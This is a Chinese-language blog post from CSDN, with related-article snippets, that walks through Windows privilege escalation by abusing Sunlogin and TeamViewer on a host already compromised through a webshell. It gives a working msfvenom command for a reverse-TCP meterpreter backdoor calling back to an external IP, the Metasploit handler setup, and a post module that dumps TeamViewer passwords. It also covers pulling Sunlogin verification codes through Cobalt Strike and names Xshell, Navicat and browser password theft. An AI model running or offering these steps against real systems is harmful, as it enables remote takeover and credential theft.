Windows提权:第三方应用

最新推荐文章于 2024-05-12 17:30:39 发布
最新推荐文章于 2024-05-12 17:30:39 发布
阅读量454 收藏 10
点赞数 7
分类专栏: 内网渗透 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/131428828
版权
本文讲述了利用向日葵和Teamviewer中的漏洞进行提权的过程,包括获取webshell权限,通过Beacon工具获取验证码,以及使用Metasploit框架创建后门。还提及了Xshell和Navicat等其他软件的密码抓取方法。
摘要由CSDN通过智能技术生成

目录

向日葵漏洞提权

Teamviewer提权

电脑(服务器)装的第三方应用越多,安全隐患越大

向日葵漏洞提权

已经拿到了webshell权限,这里的权限是普通用户的权限,查看服务进程

tasklist /svc

发现对方主机上存在向日葵的进程 

将其上线CS上,尝试通过CS抓取向日葵密码

上传工具到对方服务器

通过beacon执行工具

得到机器密文,这就是验证码,使用脚本解密

GitHub - wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具

接下来可以使用向日葵远控软件直接连接靶机,向日葵的权限往往是高权限

Teamviewer提权

后门上线权限必须是管理员权限,低权限用户不能获取

上线MSF

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.130.42 LPORT=3333 -f exe -o msf.exe   #生成后门
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

通过MSF模块获得passwd

run post/windows/gather/credentials/teamviewer_passwords

 密码一致,为uaq123

CS也有相关的插件可以利用

 还有比如:Xshell Navicat 浏览器的密码都可以通过CS进行抓取

渗透测试 提权
07-18
3. **第三方软件和服务提权**:利用非系统自带的应用程序和服务中存在的漏洞进行提权。 #### 三、Windows系统漏洞提权的详细步骤 1. **确定目标系统的漏洞状态**:可以通过`systeminfo`命令或检查补丁目录来识别未...
Windows提权---第三方软件提权、Bypass UAC提权
qq_40012781的博客
07-03 1939
第三方软件提权、Bypass UAC提权
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1190
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
第三方应用软件提权方法
m0_62207482的博客
03-09 384
3、Gene6 FTP 安全性测试(Gene6 FTP 默认安装路径是 C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini 其中 Remote.ini 是主配置文件,管理员登录的 ip、端口和密码都存储在这。2、FlashFXP 安全性测试(攻击者只需通过 webshell 下载 quick.dat、sites.dat、stats.dat这三个文件进行本地替换,就可以用星号查看器直接查看连接密 码)9、服务替换安全性测试。8、启动项安全性测试。
【权限提升】利用第三方应用Teamviewer&向日葵&Navivat-凭据
今天是几号的博客
02-18 908
远控类 利用向日葵漏洞提权 漏洞版本百度云链接 搭建: 为追求真实服务器环境,采用阿里云ECS弹性服务器搭建靶场(windows server2012 + phpstudy) 背景: 已有webshell权限,利用探针(查看端口,进程等)知道服务器安装了向日葵服务 tasklist /svc提权工具-CS 上传后门,会连会话,这里由于搭建原因忽悠是administrator权限,当做是普通用户权限,且无法正常提权至系统权限 利用CS插件上传向日葵提权工具 上传 执行 机器密文就是验证码,使用Python高版
第三方提权
一个普普通通的博客
04-17 2074
第三方提权 可以进入注册表查看装了哪些软件 搜狗输入法提权 原理:通过搜狗输入法的权限不严格,在默认安装搜狗输入法时,权限赋予过大,everyone(所有)权限(绝对控制) 通过伪造exe文件,例如更新程序,在对方进行软件更新或内容更新时,自动执行提前写好的bat脚本(quick batch) FileZilla、ftp、迅雷、搜狗输入法、vnc、老版本360等第三方软件的特别版本均存在此提权方法 LPK劫持(dll劫持) 一种是需要程序本身的dll,根据函数仿制一个dll 另一种是直接生成一个恶意dl
向日葵RCE后续利用之本地提权
weixin_45794666的博客
02-27 1262
根据玄武实验室的文章 https://github.com/Ryze-T/CNVD-2022-10270-LPE 找到目标日志文件 cd /d c:/ dir /S sunlogin_service* 向日葵日志文件 sunlogin_service.20220226-171345.log 复现 安装.NET 4 https://www.microsoft.com/zh-cn/download/details.aspx?id=17718 在运行,发现需要指定路径路径,而我在win7下目录为 C:
3389_3389_3389自动打开_远程控制_提权_
10-03
然而,这也意味着如果未经授权的第三方能够访问3389端口,就可能对系统造成安全威胁,因此,确保远程桌面的安全性至关重要。 "提权"一词在网络安全中指的是攻击者获取系统更高的权限,例如从普通用户权限升级到管理...
无net添加用户提权
09-13
在这种情况下,"无net提权工具"可能是一个第三方软件或者是一个利用了系统漏洞的exploit(利用程序)。这些工具或exploits可能通过API调用、注册表修改或其他系统接口直接与操作系统交互,以创建用户账户并赋予高...
MS10-048 windows本地提权 32位、64位EXP
03-04
系统管理员应当及时应用官方发布的安全更新,避免使用未经验证的第三方EXP,并保持对网络安全动态的关注,以防止此类漏洞被恶意利用。同时,用户应避免打开来源不明的文件,尤其是TrueType字体文件,以减少潜在的...
KiTrap0D windows提权
08-24
windows提权 ,不知道有没有,先上传上来再说
windows下的 Nsudo提权工具,支持system权限
02-05
类似Linux下的 sudo 命令的一款windows下工具,支持任意权限提权和令牌,包括system账户,附带命令行工具和源代码
windows2003 oday
06-10
对于不再受支持的操作系统,可以考虑采用第三方安全解决方案或加强网络隔离。同时,定期进行安全审计和监控,以及部署入侵检测和预防系统也是必要的。此外,限制不必要的服务和端口,以及采用强密码策略,可以帮助...
Linux提权--第三方软件MYSQL数据库提权(WEB+本地)
最新发布
金灰的博客
05-12 985
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)
我了解豹女就像农民伯伯了解大米
03-19 1326
目录 漏洞描述: 工具复现: CS服务器上线:(失败) 漏洞描述: 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 工具复现: 同一局域网: 攻击机:172.5
第100天:权限提升-数据库&Redis&Postgre&第三方软件&TV&向日葵&服务类
qq_46081990的博客
06-22 347
【代码】第100天:权限提升-数据库&Redis&Postgre&第三方软件&TV&向日葵&服务类。
利用第三方软件提权
cxrpty的博客
03-12 1242
实验环境:windows2008 实验步骤: 一、搭建环境 1.关闭防火墙,在wwwroot写入yjh.aspx,密码为-7 2.用菜刀连接 二、实验操作 1.查看当前系统上所运行的软件:tasklist,可看是否运行了Filezilla server 2.用菜刀上传端口转发工具lcx.exe到temp文件夹 2.进行端口转发:lcx.exe -tran 14141127...
hackmap-[windows权限提升(windows提权思路)]
m0_43405474的博客
04-09 5017
hackmap-[windows权限提升{windows提权思路}]1.前言1.1.提权分类水平权限提升(越权)垂直权限提升1.2 windows提权概述2.windows基于WebShell提权2.1 前言2.1.1 asp大马 vs aspx大马(windows2003+IIS)1)asp大马2)aspx大马3)小结2.1.2 基于系统漏洞提权1)信息收集2)漏洞补丁对照表3)提权过程3.实战3.1针对2003 KB952004 提权实验step1:利用aspx大马进行信息搜集——补丁安装情况step2
Windows系统常见提权方式
m0_64481831的博客
03-26 1659
提权依然要查看一些条件,最简单的办法就是直接尝试提权,能成功就成功,因为现实的环境都是很复杂的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值